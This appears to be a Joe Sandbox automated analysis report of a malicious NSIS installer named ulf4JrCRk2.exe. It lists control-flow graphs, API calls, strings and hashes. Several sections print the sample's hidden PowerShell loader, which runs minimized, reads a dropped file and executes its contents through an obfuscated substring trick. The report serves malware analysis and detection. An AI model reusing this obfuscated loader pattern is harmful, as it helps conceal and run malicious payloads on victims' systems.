401850 3717->3725 3718 405cf1 lstrcpynA 3718->3731 3720 402f1f 46 API calls 3719->3720 3721 401881 3720->3721 3722 401895 SetFileTime 3721->3722 3723 4018a7 CloseHandle 3721->3723 3722->3723 3723->3725 3726 4018b8 3723->3726 3724 405d13 18 API calls 3724->3731 3727 4018d0 3726->3727 3728 4018bd 3726->3728 3730 405d13 18 API calls 3727->3730 3729 405d13 18 API calls 3728->3729 3732 4018c5 lstrcatA 3729->3732 3734 4018d8 3730->3734 3731->3711 3731->3712 3731->3714 3731->3715 3731->3718 3731->3724 3733 405505 MessageBoxIndirectA 3731->3733 3735 40183b 3731->3735 3737 405982 GetFileAttributesA CreateFileA 3731->3737 3732->3734 3733->3731 3736 405505 MessageBoxIndirectA 3734->3736 3735->3717 3735->3725 3736->3725 3737->3731 3738->3706 3739->3707 4359 40163f 4360 4029fd 18 API calls 4359->4360 4361 401645 4360->4361 4362 405ff5 2 API calls 4361->4362 4363 40164b 4362->4363 4364 40193f 4365 4029e0 18 API calls 4364->4365 4366 401946 4365->4366 4367 4029e0 18 API calls 4366->4367 4368 401950 4367->4368 4369 4029fd 18 API calls 4368->4369 4370 401959 4369->4370 4371 40196c lstrlenA 4370->4371 4373 4019a7 4370->4373 4372 401976 4371->4372 4372->4373 4377 405cf1 lstrcpynA 4372->4377 4375 401990 4375->4373 4376 40199d lstrlenA 4375->4376 4376->4373 4377->4375

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 40601c SHGetFileInfoA call 405cf1 GetCommandLineA call 405cf1 GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 4057ac CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 17 4032e9-4032ea 15->17 18 4032ef-4032f2 15->18 25 403423-40343d DeleteFileA call 402c79 16->25 26 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->26 17->18 20 403384-403391 call 4057ac 18->20 21 4032f8-4032fc 18->21 20->11 36 403393 20->36 23 403314-403341 21->23 24 4032fe-403304 21->24 32 403343-403349 23->32 33 403354-403382 23->33 30 403306-403308 24->30 31 40330a 24->31 41 4034d1-4034e0 ExitProcess CoUninitialize 25->41 42 403443-403449 25->42 26->25 44 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 26->44 30->23 30->31 31->23 37 40334b-40334d 32->37 38 40334f 32->38 33->20 40 4033a0-4033ac call 405cf1 33->40 36->11 37->33 37->38 38->33 40->16 47 4034e6-4034f6 call 405505 ExitProcess 41->47 48 4035da-4035e0 41->48 45 4034c1-4034c8 call 403787 42->45 46 40344b-403456 call 4057ac 42->46 44->25 44->41 57 4034cd 45->57 63 403458-403481 46->63 64 40348c-403496 46->64 50 4035e6-403603 call 40601c * 3 48->50 51 40367d-403685 48->51 81 403605-403607 50->81 82 40364d-40365b call 40601c 50->82 60 403687 51->60 61 40368b-40368f ExitProcess 51->61 57->41 60->61 66 403483-403485 63->66 67 403498-4034a5 call 40586f 64->67 68 4034fc-403516 lstrcatA lstrcmpiA 64->68 66->64 70 403487-40348a 66->70 67->41 79 4034a7-4034bd call 405cf1 * 2 67->79 68->41 71 403518-40352d CreateDirectoryA SetCurrentDirectoryA 68->71 70->64 70->66 74 40353a-403562 call 405cf1 71->74 75 40352f-403535 call 405cf1 71->75 85 403568-403584 call 405d13 DeleteFileA 74->85 75->74 79->45 81->82 87 403609-40360b 81->87 95 403669-403674 ExitWindowsEx 82->95 96 40365d-403667 82->96 97 4035c5-4035cc 85->97 98 403586-403596 CopyFileA 85->98 87->82 92 40360d-40361f GetCurrentProcess 87->92 92->82 105 403621-403643 92->105 95->51 99 403676-403678 call 40140b 95->99 96->95 96->99 97->85 104 4035ce-4035d5 call 405ba5 97->104 98->97 101 403598-4035b8 call 405ba5 call 405d13 call 4054a4 98->101 99->51 101->97 115 4035ba-4035c1 CloseHandle 101->115 104->41 105->82 115->97
                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 00403238
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                                                                                • OleInitialize.OLE32(00000000), ref: 0040324A
                                                                                                  • Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                                                                  • Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
                                                                                                  • Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                                                                • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272
                                                                                                  • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                                                                • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000000), ref: 0040329A
                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000020), ref: 004032C5
                                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                                                                                • ExitProcess.KERNEL32(?), ref: 004034D1
                                                                                                • CoUninitialize.COMBASE(?), ref: 004034D6
                                                                                                • ExitProcess.KERNEL32 ref: 004034F6
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000000,?), ref: 00403502
                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                                                                                • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ,?), ref: 0040357A
                                                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\ulf4JrCRk2.exe,0041E8B8,00000001), ref: 0040358E
                                                                                                • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                                                                                • ExitProcess.KERNEL32 ref: 0040368F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                • String ID: "$"C:\Users\user\Desktop\ulf4JrCRk2.exe"$"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $$Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77)$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\supersystem\panelet$C:\Users\user\AppData\Roaming\supersystem\panelet$C:\Users\user\Desktop$C:\Users\user\Desktop\ulf4JrCRk2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                • API String ID: 2762237255-1150445887
                                                                                                • Opcode ID: ad8daaa377ef6082241525d97a33f3446afdd9c228298bd2e1744150241bbf9a
                                                                                                • Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
                                                                                                • Opcode Fuzzy Hash: ad8daaa377ef6082241525d97a33f3446afdd9c228298bd2e1744150241bbf9a
                                                                                                • Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 116 40511a-405136 117 4052c7-4052cd 116->117 118 40513c-405205 GetDlgItem * 3 call 404021 call 40487a GetClientRect GetSystemMetrics SendMessageA * 2 116->118 120 4052f7-405303 117->120 121 4052cf-4052f1 GetDlgItem CreateThread CloseHandle 117->121 140 405223-405226 118->140 141 405207-405221 SendMessageA * 2 118->141 123 405325-40532b 120->123 124 405305-40530b 120->124 121->120 128 405380-405383 123->128 129 40532d-405333 123->129 126 405346-40534d call 404053 124->126 127 40530d-405320 ShowWindow * 2 call 404021 124->127 137 405352-405356 126->137 127->123 128->126 134 405385-40538b 128->134 130 405335-405341 call 403fc5 129->130 131 405359-405369 ShowWindow 129->131 130->126 138 405379-40537b call 403fc5 131->138 139 40536b-405374 call 404fdc 131->139 134->126 142 40538d-4053a0 SendMessageA 134->142 138->128 139->138 145 405236-40524d call 403fec 140->145 146 405228-405234 SendMessageA 140->146 141->140 147 4053a6-4053d2 CreatePopupMenu call 405d13 AppendMenuA 142->147 148 40549d-40549f 142->148 155 405283-4052a4 GetDlgItem SendMessageA 145->155 156 40524f-405263 ShowWindow 145->156 146->145 153 4053d4-4053e4 GetWindowRect 147->153 154 4053e7-4053fd TrackPopupMenu 147->154 148->137 153->154 154->148 157 405403-40541d 154->157 155->148 160 4052aa-4052c2 SendMessageA * 2 155->160 158 405272 156->158 159 405265-405270 ShowWindow 156->159 161 405422-40543d SendMessageA 157->161 162 405278-40527e call 404021 158->162 159->162 160->148 161->161 163 40543f-40545f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->155 165 405461-405481 SendMessageA 163->165 165->165 166 405483-405497 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->148
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040517A
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405189
                                                                                                • GetClientRect.USER32(?,?), ref: 004051C6
                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051CE
                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
                                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
                                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040526A
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040528B
                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405198
                                                                                                  • Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052DC
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052F1
                                                                                                • ShowWindow.USER32(00000000), ref: 00405314
                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040531B
                                                                                                • ShowWindow.USER32(00000008), ref: 00405361
                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
                                                                                                • CreatePopupMenu.USER32 ref: 004053A6
                                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
                                                                                                • GetWindowRect.USER32(?,000000FF), ref: 004053DB
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053F4
                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
                                                                                                • OpenClipboard.USER32(00000000), ref: 00405440
                                                                                                • EmptyClipboard.USER32 ref: 00405446
                                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405459
                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405486
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405491
                                                                                                • CloseClipboard.USER32 ref: 00405497
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: reckling: Installing
                                                                                                • API String ID: 590372296-1062532133
                                                                                                • Opcode ID: c4cb536f8e799d3d5e9376cf28b8e230f7fac2783e3879569b83d2f34c1c5795
                                                                                                • Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
                                                                                                • Opcode Fuzzy Hash: c4cb536f8e799d3d5e9376cf28b8e230f7fac2783e3879569b83d2f34c1c5795
                                                                                                • Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 412 405d13-405d1e 413 405d20-405d2f 412->413 414 405d31-405d46 412->414 413->414 415 405f39-405f3d 414->415 416 405d4c-405d57 414->416 417 405f43-405f4d 415->417 418 405d69-405d73 415->418 416->415 419 405d5d-405d64 416->419 420 405f58-405f59 417->420 421 405f4f-405f53 call 405cf1 417->421 418->417 422 405d79-405d80 418->422 419->415 421->420 424 405d86-405dbb 422->424 425 405f2c 422->425 426 405dc1-405dcc GetVersion 424->426 427 405ed6-405ed9 424->427 428 405f36-405f38 425->428 429 405f2e-405f34 425->429 432 405de6 426->432 433 405dce-405dd2 426->433 430 405f09-405f0c 427->430 431 405edb-405ede 427->431 428->415 429->415 438 405f1a-405f2a lstrlenA 430->438 439 405f0e-405f15 call 405d13 430->439 435 405ee0-405eec call 405c4f 431->435 436 405eee-405efa call 405cf1 431->436 437 405ded-405df4 432->437 433->432 434 405dd4-405dd8 433->434 434->432 440 405dda-405dde 434->440 450 405eff-405f05 435->450 436->450 442 405df6-405df8 437->442 443 405df9-405dfb 437->443 438->415 439->438 440->432 446 405de0-405de4 440->446 442->443 448 405e34-405e37 443->448 449 405dfd-405e18 call 405bd8 443->449 446->437 453 405e47-405e4a 448->453 454 405e39-405e45 GetSystemDirectoryA 448->454 457 405e1d-405e20 449->457 450->438 452 405f07 450->452 458 405ece-405ed4 call 405f5c 452->458 455 405eb4-405eb6 453->455 456 405e4c-405e5a GetWindowsDirectoryA 453->456 459 405eb8-405ebb 454->459 455->459 460 405e5c-405e66 455->460 456->455 461 405e26-405e2f call 405d13 457->461 462 405ebd-405ec1 457->462 458->438 459->458 459->462 464 405e80-405e96 SHGetSpecialFolderLocation 460->464 465 405e68-405e6b 460->465 461->459 462->458 467 405ec3-405ec9 lstrcatA 462->467 470 405eb1 464->470 471 405e98-405eaf SHGetPathFromIDListA CoTaskMemFree 464->471 465->464 469 405e6d-405e74 465->469 467->458 473 405e7c-405e7e 469->473 470->455 471->459 471->470 473->459 473->464
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(?,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00405014,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000), ref: 00405DC4
                                                                                                • GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E3F
                                                                                                • GetWindowsDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E52
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
                                                                                                • SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00405E9C
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00405EA7
                                                                                                • lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
                                                                                                • lstrlenA.KERNEL32(004226A0,?,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00405014,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000), ref: 00405F1B
                                                                                                Strings
                                                                                                • Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", xrefs: 00405D42
                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC3
                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0E
                                                                                                • "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 00405EF3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 900638850-2846839831
                                                                                                • Opcode ID: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
                                                                                                • Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
                                                                                                • Opcode Fuzzy Hash: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
                                                                                                • Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 474 4055b1-4055d7 call 40586f 477 4055f0-4055f7 474->477 478 4055d9-4055eb DeleteFileA 474->478 480 4055f9-4055fb 477->480 481 40560a-40561a call 405cf1 477->481 479 40577a-40577e 478->479 482 405601-405604 480->482 483 405728-40572d 480->483 489 405629-40562a call 4057c8 481->489 490 40561c-405627 lstrcatA 481->490 482->481 482->483 483->479 485 40572f-405732 483->485 487 405734-40573a 485->487 488 40573c-405744 call 405ff5 485->488 487->479 488->479 498 405746-40575a call 405781 call 405569 488->498 492 40562f-405632 489->492 490->492 495 405634-40563b 492->495 496 40563d-405643 lstrcatA 492->496 495->496 497 405648-405666 lstrlenA FindFirstFileA 495->497 496->497 499 40566c-405683 call 4057ac 497->499 500 40571e-405722 497->500 513 405772-405775 call 404fdc 498->513 514 40575c-40575f 498->514 507 405685-405689 499->507 508 40568e-405691 499->508 500->483 502 405724 500->502 502->483 507->508 510 40568b 507->510 511 405693-405698 508->511 512 4056a4-4056b2 call 405cf1 508->512 510->508 516 40569a-40569c 511->516 517 4056fd-40570f FindNextFileA 511->517 525 4056b4-4056bc 512->525 526 4056c9-4056d4 call 405569 512->526 513->479 514->487 519 405761-405770 call 404fdc call 405ba5 514->519 516->512 520 40569e-4056a2 516->520 517->499 522 405715-405718 FindClose 517->522 519->479 520->512 520->517 522->500 525->517 529 4056be-4056c7 call 4055b1 525->529 534 4056f5-4056f8 call 404fdc 526->534 535 4056d6-4056d9 526->535 529->517 534->517 536 4056db-4056eb call 404fdc call 405ba5 535->536 537 4056ed-4056f3 535->537 536->517 537->517
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 004055DA
                                                                                                • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405622
                                                                                                • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405643
                                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405649
                                                                                                • FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 0040565A
                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405718
                                                                                                Strings
                                                                                                • \*.*, xrefs: 0040561C
                                                                                                • "C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 004055B1
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004055BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-1937006835
                                                                                                • Opcode ID: eb34a846460c19c0258b3e4f17f040ba4638f1e183412731446f157f3717bfe2
                                                                                                • Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
                                                                                                • Opcode Fuzzy Hash: eb34a846460c19c0258b3e4f17f040ba4638f1e183412731446f157f3717bfe2
                                                                                                • Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E
                                                                                                Memory Dump Source
